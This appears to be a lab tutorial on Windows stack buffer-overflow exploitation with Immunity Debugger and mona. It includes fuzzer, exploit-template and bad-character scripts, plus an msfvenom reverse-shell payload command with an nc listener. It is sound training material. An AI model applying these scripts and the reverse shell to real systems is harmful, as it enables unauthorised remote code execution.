Buffer overflow using Immunity Debugger
· Right-click the Immunity Debugger icon on the Desktop and choose “Run as administrator”.
· Open the vulnerable executable in Immunity Debugger and run it (F9). Repeat this after every crash: the process must be restarted and running before each of the steps below.
· Run !mona config -set workingfolder c:\mona\%p (%p expands to the process name, so the files below land in c:\mona\oscp for a binary called oscp.exe).
· Run fuzzer.py. It sends ever-larger buffers until the service stops responding; note the byte count printed at the crash.
· Exploit the BOF with exploit.py:
o Create a cyclic pattern a few hundred bytes longer than the crash length, e.g. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600, put it in the payload variable of exploit.py, restart the program and run exploit.py.
· Run !mona findmsp -distance 600 (the same length as the pattern). The line reporting what EIP contains gives the offset to EIP.
· Update your exploit.py script:
o Set the offset variable to that value.
o Set the payload variable back to an empty string.
o Set the retn variable to “BBBB”.
o Restart the program and run exploit.py again; EIP should now read 42424242, which confirms the offset is right.
· To find bad characters:
o !mona bytearray -b “\x00” creates an array of all byte values without the null byte and writes bytearray.bin to the working folder.
o Run badchars.py to generate the matching \x01..\xff string.
o Put the string in the payload variable of exploit.py, restart the program and run it.
o Run !mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>, where <ESP> is the ESP value shown at the crash.
o Take only the first byte mona reports as modified: a bad character can corrupt everything after it, so later mismatches may be false. Add it to the -b list (e.g. -b “\x00\x0a”), regenerate the bytearray, remove it from the string in payload as well, and repeat until the comparison returns Unmodified.
· To find a jump address:
o Run !mona jmp -r esp -cpb “\x00...” with every bad character found, so the returned address contains none of them. Prefer a module that mona shows without ASLR, Rebase, SafeSEH or NXCompat.
o Put the address in the retn variable of exploit.py in little-endian byte order (an address 0x11223344 becomes “\x44\x33\x22\x11”).
· Generate the payload:
o msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b “\x00...” -f c, with -b listing all bad characters found.
o Put the generated string in the payload variable of exploit.py.
o Set the padding variable to “\x90” * 16: the encoder’s decoder stub overwrites a few bytes around ESP while unpacking, so the NOP sled keeps it from clobbering the shellcode itself.
o Start a listener: nc -nlvp 4444 (the LPORT you used).
o Restart the program, run exploit.py, and the listener should receive the shell.
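The steps above lean on pattern_create.rb, pattern_offset and mona for the arithmetic. The following is an added example, not part of the original notes or of mona, that reimplements those steps in plain Python so the offset, the bad-character loop and the little-endian return address can be checked offline before they go into exploit.py. The EIP value, the JMP ESP address and the fake_service_dump filter are constructed sample values, not output from the target.

```python
#!/usr/bin/env python3
# Added example (not from the original notes): offline versions of the
# pattern_create / findmsp / bytearray / compare steps used above.
import struct
from itertools import product

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Cyclic pattern in the same order as pattern_create.rb: Aa0Aa1...Ab0Ab1..."""
    out = []
    for u, l, d in product(UPPER, LOWER, DIGITS):
        out.append(u + l + d)
        if 3 * len(out) >= length:
            break
    return "".join(out)[:length]


def pattern_offset(eip_value, length=20280):
    """Offset of the bytes sitting in EIP. Immunity shows EIP as an integer
    and the x86 stack is little-endian, so pack it '<I' before searching."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


def bytearray_without(bad=b"\x00"):
    """'!mona bytearray -b' equivalent: every byte value except the excluded ones."""
    return bytes(b for b in range(256) if b not in bad)


def badchars_string(bad=b"\x00"):
    """The \\xNN... string that goes into the payload variable of exploit.py."""
    return "".join("\\x{:02x}".format(b) for b in bytearray_without(bad))


def first_bad_char(expected, observed):
    """'!mona compare' reduced to its one reliable answer: the first byte that
    did not arrive intact. Bytes after a bad character may be corrupted because
    of it, so exclude this one and resend instead of trusting later mismatches.
    Returns None when the buffer is Unmodified."""
    for i, b in enumerate(expected):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_chars(send_and_dump, always_bad=b"\x00"):
    """Repeat the bad-character loop until the dump comes back Unmodified.
    send_and_dump(payload) must return the bytes as seen at ESP."""
    bad = bytes(always_bad)
    while True:
        expected = bytearray_without(bad)
        b = first_bad_char(expected, send_and_dump(expected))
        if b is None:
            return bad
        bad += bytes([b])


def retn_bytes(jmp_esp_address):
    """Pack the address from '!mona jmp -r esp' little-endian for retn."""
    return struct.pack("<I", jmp_esp_address)


def build_buffer(prefix, offset, retn, payload, nops=16, postfix=b""):
    """Same layout as exploit.py: prefix + overflow + retn + padding + payload."""
    return prefix + b"A" * offset + retn + b"\x90" * nops + payload + postfix


def fake_service_dump(data):
    """Constructed stand-in for reading memory at ESP: this imaginary server
    truncates at a NUL and rewrites 0x0a to 0x0d."""
    return data.split(b"\x00")[0].replace(b"\x0a", b"\x0d")


if __name__ == "__main__":
    # Constructed sample: EIP as Immunity would display it after the pattern.
    print("offset:", pattern_offset(0x6F43396E))
    print("bad chars:", find_bad_chars(fake_service_dump))
    # Hypothetical JMP ESP address; use the one mona returns for the real target.
    buf = build_buffer(b"OVERFLOW1 ", 1978, retn_bytes(0x625011AF), b"\xcc" * 4)
    print("buffer length:", len(buf))
```

find_bad_chars takes a callable so the same loop can drive a real socket send plus a debugger dump; fake_service_dump only stands in for that to make the block runnable offline.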
Fuzzer.py code
#!/usr/bin/env python3
import socket, time, sys

ip = "MACHINE_IP"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "  # command the vulnerable service expects before the data

string = prefix + "A" * 100

# Send buffers that grow by 100 bytes each round; the first one that makes the
# service stop answering (timeout / connection error) is the crash length.
while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # no reply once the process has crashed
    except Exception:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
exploit.py code
import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0            # bytes before EIP, from !mona findmsp
overflow = "A" * offset
retn = ""             # "BBBB" to confirm the offset, then the JMP ESP address little-endian
padding = ""          # "\x90" * 16 once the msfvenom payload is in place
payload = ""          # cyclic pattern, bad-character string, or msfvenom shellcode
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except Exception:
    print("Could not connect.")
finally:
    s.close()
badchars.py code
# Print \x01..\xff as one string; \x00 is left out because it is always bad.
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()